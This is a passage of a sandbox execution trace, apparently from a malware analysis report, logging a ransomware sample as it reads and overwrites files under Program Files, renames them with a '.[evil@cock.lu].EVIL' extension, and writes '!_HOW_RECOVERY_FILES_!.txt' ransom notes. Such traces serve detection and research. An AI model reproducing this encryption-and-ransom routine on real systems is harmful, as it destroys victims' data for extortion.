_String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0087.840] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="OfficeUpdateSchedule.xml") returned 0x0 [0087.840] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 0x53 [0087.840] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0087.842] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x12ae, lpOverlapped=0x0) returned 1 [0087.865] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0087.865] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0087.865] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0087.865] _errno () returned 0x84b1160840 [0087.865] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.865] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x12c0, lpOverlapped=0x0) returned 1 [0087.865] CloseHandle (hObject=0x1a4) returned 1 [0087.897] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0087.899] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0087.899] __uncaught_exception () returned 0x84b1160800 [0087.899] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0087.903] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml.[evil@cock.lu].evil")) returned 1 [0087.907] ??_V@YAXPEAX@Z () returned 0x1 [0087.910] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml", dwFileAttributes=0x0) returned 0 [0087.910] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0087.910] wcsstr (_Str="ServiceWatcherSchedule.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0087.910] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 85 [0087.910] wcscmp (_String1="ServiceWatcherSchedule.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0087.910] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ServiceWatcherSchedule.xml") returned 0x0 [0087.910] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned 0x55 [0087.911] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0087.913] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x1162, lpOverlapped=0x0) returned 1 [0087.931] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0087.931] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0087.931] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0087.931] _errno () returned 0x84b1160840 [0087.931] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.931] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x1180, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x1180, lpOverlapped=0x0) returned 1 [0087.932] CloseHandle (hObject=0x1a4) returned 1 [0087.934] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0087.936] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0087.936] __uncaught_exception () returned 0x84b1160800 [0087.936] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0087.936] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml.[evil@cock.lu].evil")) returned 1 [0087.937] ??_V@YAXPEAX@Z () returned 0x1 [0087.940] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml", dwFileAttributes=0x0) returned 0 [0087.940] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0087.940] wcsstr (_Str="StreamServer.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0087.940] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 75 [0087.940] wcscmp (_String1="StreamServer.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0087.940] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="StreamServer.dll") returned 0x0 [0087.940] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 0x4b [0087.940] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0087.940] GetLastError () returned 0x20 [0087.940] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0087.940] wcsstr (_Str="ucrtbase.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0087.940] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 71 [0087.940] wcscmp (_String1="ucrtbase.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0087.940] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ucrtbase.dll") returned 0x0 [0087.940] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 0x47 [0087.940] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0087.942] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xefec0, lpOverlapped=0x0) returned 1 [0088.197] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0088.197] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0088.197] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0088.197] _errno () returned 0x84b1160840 [0088.198] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.198] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xefee0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xefee0, lpOverlapped=0x0) returned 1 [0088.200] CloseHandle (hObject=0x1a4) returned 1 [0088.209] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.209] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0088.209] __uncaught_exception () returned 0x84b1160800 [0088.209] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.219] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll.[evil@cock.lu].evil")) returned 1 [0088.220] ??_V@YAXPEAX@Z () returned 0x1 [0088.223] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll", dwFileAttributes=0x0) returned 0 [0088.223] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.223] wcsstr (_Str="vccorlib140.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.223] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 74 [0088.223] wcscmp (_String1="vccorlib140.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.223] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="vccorlib140.dll") returned 0x0 [0088.223] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 0x4a [0088.223] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0088.225] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x60948, lpOverlapped=0x0) returned 1 [0088.361] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0088.361] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0088.361] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0088.361] _errno () returned 0x84b1160840 [0088.362] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.362] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x60960, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x60960, lpOverlapped=0x0) returned 1 [0088.363] CloseHandle (hObject=0x1a4) returned 1 [0088.367] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.368] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0088.368] __uncaught_exception () returned 0x84b1160800 [0088.368] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.372] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll.[evil@cock.lu].evil")) returned 1 [0088.373] ??_V@YAXPEAX@Z () returned 0x1 [0088.376] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll", dwFileAttributes=0x0) returned 0 [0088.377] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.377] wcsstr (_Str="vcruntime140.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.377] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 75 [0088.377] wcscmp (_String1="vcruntime140.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.377] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="vcruntime140.dll") returned 0x0 [0088.377] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll") returned 0x4b [0088.377] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.377] GetLastError () returned 0x20 [0088.377] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0088.377] FindClose (in: hFindFile=0x84b11dd200 | out: hFindFile=0x84b11dd200) returned 1 [0088.377] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun") returned 0x3a [0088.377] strlen (_Str="${KEY}") returned 0x6 [0088.377] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.377] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.377] strlen (_Str="${CODE}") returned 0x7 [0088.377] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.377] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.377] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.377] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.378] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.378] __uncaught_exception () returned 0x84b1160800 [0088.378] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.379] FindNextFileW (in: hFindFile=0x84b11dd2c0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0088.379] wcsstr (_Str="ink", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.379] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink") returned 51 [0088.379] wcscmp (_String1=".", _String2="ink") returned -1 [0088.379] wcscmp (_String1="..", _String2="ink") returned -1 [0088.379] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink") returned 0x33 [0088.379] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink") returned 0x0 [0088.379] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\*" [0088.379] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd260 [0088.380] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.380] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\.") returned 53 [0088.380] wcscmp (_String1=".", _String2=".") returned 0 [0088.380] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.380] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.380] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\..") returned 54 [0088.380] wcscmp (_String1=".", _String2="..") returned -1 [0088.380] wcscmp (_String1="..", _String2="..") returned 0 [0088.380] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.380] wcsstr (_Str="Alphabet.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.380] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 64 [0088.380] wcscmp (_String1="Alphabet.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.380] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="Alphabet.xml") returned 0x0 [0088.380] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 0x40 [0088.380] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.391] GetLastError () returned 0x5 [0088.391] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.391] wcsstr (_Str="ar-SA", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.391] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA") returned 57 [0088.391] wcscmp (_String1=".", _String2="ar-SA") returned -1 [0088.391] wcscmp (_String1="..", _String2="ar-SA") returned -1 [0088.391] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA") returned 0x39 [0088.391] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA") returned 0x0 [0088.391] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*" [0088.391] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd5c0 [0088.391] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.391] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\.") returned 59 [0088.391] wcscmp (_String1=".", _String2=".") returned 0 [0088.391] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.392] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.392] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\..") returned 60 [0088.392] wcscmp (_String1=".", _String2="..") returned -1 [0088.392] wcscmp (_String1="..", _String2="..") returned 0 [0088.392] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.392] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.392] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 73 [0088.392] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.392] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.392] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui") returned 0x49 [0088.392] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.392] GetLastError () returned 0x5 [0088.392] FindNextFileW (in: hFindFile=0x84b11dd5c0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.392] FindClose (in: hFindFile=0x84b11dd5c0 | out: hFindFile=0x84b11dd5c0) returned 1 [0088.393] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA") returned 0x39 [0088.393] strlen (_Str="${KEY}") returned 0x6 [0088.393] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.393] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.393] strlen (_Str="${CODE}") returned 0x7 [0088.393] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.393] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.393] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.393] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.393] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.393] __uncaught_exception () returned 0x84b1160800 [0088.393] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.394] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.394] wcsstr (_Str="bg-BG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.394] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG") returned 57 [0088.394] wcscmp (_String1=".", _String2="bg-BG") returned -1 [0088.394] wcscmp (_String1="..", _String2="bg-BG") returned -1 [0088.394] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG") returned 0x39 [0088.394] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG") returned 0x0 [0088.394] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*" [0088.394] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11ddc20 [0088.394] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.394] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\.") returned 59 [0088.394] wcscmp (_String1=".", _String2=".") returned 0 [0088.394] FindNextFileW (in: hFindFile=0x84b11ddc20, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.394] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.394] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\bg-BG\\..") returned 60 [0088.394] wcscmp (_String1=".", _String2="..") returned -1 [0088.394] wcscmp (_String1="..", _String2="..") returned 0 [0088.394] FindNextFileW (in: hFindFile=0x84b11ddc20, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.394] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.394] _snwprintf (in: 